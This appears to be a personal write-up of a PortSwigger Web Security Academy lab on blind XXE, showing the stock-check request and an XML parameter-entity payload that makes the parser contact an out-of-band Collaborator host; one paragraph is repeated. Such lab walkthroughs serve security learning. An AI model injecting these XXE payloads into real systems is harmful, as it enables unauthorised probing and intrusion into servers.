Blind XXE with out of band interaction via XML parameter entities

Description

This lab has a "Check stock" feature that parses XML input, but does not display any unexpected values, and blocks requests containing regular external entities.

To solve the lab, use a parameter entity to make the XML parser issue a DNS lookup and HTTP request to Burp Collaborator.

Approach

After accessing the lab, I encountered a POST request sending XML data to the backend:

POST /product/stock HTTP/2
Host: 0a14008e04efe1c3830015e900950001.web-security-academy.net
Cookie: session=WjmqxdAKpLkSGsy1ScUCoZUx4dQirEGC
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 
...

<?xml version="1.0" encoding="UTF-8"?>
	<stockCheck>
		<productId>1</productId>
		<storeId>1</storeId>
	</stockCheck>

My initial attempt to exploit XXE by fetching local files failed, likely due to input validation or XML parser hardening. To overcome this, I decided to use XML parameter entities instead. These entities are a special kind of XML entity that can only be referenced within the document type definition (DTD).

The format of the DTD used for the payload was as follows:

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://splacb0ckpba1ws7l9v6rpsv4mady3ms.oastify.com"> &xxe;]>

So i will be using XML parameter entities instead; XML parameter entities are a special kind of XML entity which can only be referenced elsewhere within the DTD(document type definition).

The format of the DTD will be as follows:

<!DOCTYPE ichyaboy [ <!ENTITY % xxe SYSTEM "http://**********.web-attacker.com"> %xxe; ]>

I injected this payload and then monitored the Burp Collaborator tab, subsequently pressing "Poll now" to check for any interactions.

POST /product/stock HTTP/2
Host: 0a14008e04efe1c3830015e900950001.web-security-academy.net
Cookie: session=WjmqxdAKpLkSGsy1ScUCoZUx4dQirEGC


<?xml version="1.0" encoding="UTF-8"?>
	<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://splacb0ckpba1ws7l9v6rpsv4mady3ms.oastify.com"> %xxe;]>
	<stockCheck>
		<productId>1</productId>
		<storeId>1</storeId>
	</stockCheck>

Upon observing DNS and HTTP requests in the Burp Collaborator, I confirmed the success of the XXE injection, indicating the resolution of the lab.

PreviousBlind XXE with out of band interactionNextExploiting blind XXE to exfiltrate data using a malicious external DTD